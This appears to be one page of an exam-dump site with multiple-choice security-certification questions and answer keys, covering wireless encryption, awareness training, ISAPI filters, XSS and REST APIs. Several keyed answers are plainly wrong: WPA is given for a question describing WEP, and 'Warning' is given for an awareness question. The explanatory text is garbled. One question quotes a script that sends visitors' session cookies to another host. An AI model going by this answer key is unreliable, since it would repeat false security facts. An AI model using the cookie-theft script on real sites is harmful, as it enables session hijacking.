- Email support@dumps4free.com
There have been concerns in your network that the wireless network component is not
sufficiently secure. You perform a vulnerability scan of the wireless network and find that it
is using an old encryption protocol that was designed to mimic wired encryption, what
encryption protocol is being used?
A.
WEP
B.
RADIUS
C.
WPA
D.
WPA3
WPA
Wi-Fi Protected Access (WPA), Wi-Fi Protected Access II (WPA2), and Wi-Fi Protected
Access 3 (WPA3) are the three security and security certification programs developed by
the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in
response to serious weaknesses researchers had found within the previous system, Wired
Equivalent Privacy (WEP).WPA (sometimes mentioned because the draft IEEE 802.11i
standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate
measure in anticipation of the supply of the safer and sophisticated WPA2, which became
available in 2004 and may be a common shorthand for the complete IEEE 802.11i (or IEEE
802.11i-2004) standard.In January 2018, Wi-Fi Alliance announced the discharge of WPA3
with several security improvements over WPA2.The Wi-Fi Alliance intended WPA as an
intermediate measure to require the place of WEP pending the supply of the complete
IEEE 802.11i standard. WPA might be implemented through firmware upgrades on
wireless network interface cards designed for WEP that began shipping as far back as
1999. However, since the changes required within the wireless access points (APs) were
more extensive than those needed on the network cards, most pre-2003 APs couldn’t be
upgraded to support WPA.The WPA protocol implements much of the IEEE 802.11i
standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA.
WEP used a 64-bit or 128-bit encryption key that has got to be manually entered on
wireless access points and devices and doesn’t change. TKIP employs a per-packet key,
meaning that it dynamically generates a replacement 128-bit key for every packet and thus
prevents the kinds of attacks that compromised WEP.WPA also includes a Message
Integrity Check, which is meant to stop an attacker from altering and resending data
packets. This replaces the cyclic redundancy check (CRC) that was employed by the WEP
standard. CRC’s main flaw was that it didn’t provide a sufficiently strong data integrity
guarantee for the packets it handled. Well-tested message authentication codes existed to
unravel these problems, but they required an excessive amount of computation to be used
on old network cards. WPA uses a message integrity check algorithm called TKIP to verify
the integrity of the packets. TKIP is far stronger than a CRC, but not as strong because the
algorithm utilized in WPA2. Researchers have since discovered a flaw in WPA that relied
on older weaknesses in WEP and therefore the limitations of the message integrity code
hash function, named Michael, to retrieve the keystream from short packets to use for reinjection
and spoofing
Vlady works in a fishing company where the majority of the employees have very little
understanding of IT let alone IT Security. Several information security issues that Vlady
often found includes, employees sharing password, writing his/her password on a post it
note and stick it to his/her desk, leaving the computer unlocked, didn’t log out from emails
or other social media accounts, and etc.
After discussing with his boss, Vlady decided to make some changes to improve the
security environment in his company. The first thing that Vlady wanted to do is to make the
employees understand the importance of keeping confidential information, such as
password, a secret and they should not share it with other persons.
Which of the following steps should be the first thing that Vlady should do to make the
employees in his company understand to importance of keeping confidential information a
secret?
A.
Warning to those who write password on a post it note and put it on his/her desk
B.
Developing a strict information security policy
C.
Information security awareness training
D.
Conducting a one to one discussion with the other employees about the importance of information security
Warning to those who write password on a post it note and put it on his/her desk
Why should the security analyst disable/remove unnecessary ISAPI filters?
A.
To defend against social engineering attacks
B.
To defend against webserver attacks
C.
To defend against jailbreaking
D.
To defend against wireless attacks
To defend against webserver attacks
Judy created a forum, one day. she discovers that a user is posting strange images without
writing comments.
She immediately calls a security expert, who discovers that the following code is hidden
behind those images:
<script>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+
escape(document.cookie)+ " />); </script>
What issue occurred for the users who clicked on the image?
A.
The code inject a new cookie to the browser.
B.
The code redirects the user to another site.
C.
The code is a virus that is attempting to gather the users username and password.
D.
This php file silently executes the code and grabs the users session cookie and session
ID.
This php file silently executes the code and grabs the users session cookie and session
ID.
Gilbert, a web developer, uses a centralized web API to reduce complexity and increase
the Integrity of updating and changing data. For this purpose, he uses a web service that
uses HTTP methods such as PUT. POST. GET. and DELETE and can improve the overall
performance, visibility, scalability, reliability, and portability of an application. What is the
type of web-service API mentioned in the above scenario?
A.
JSON-RPC
B.
SOAP API
C.
RESTful API
D.
REST API
REST API
| Page 4 out of 104 Pages |
| Previous |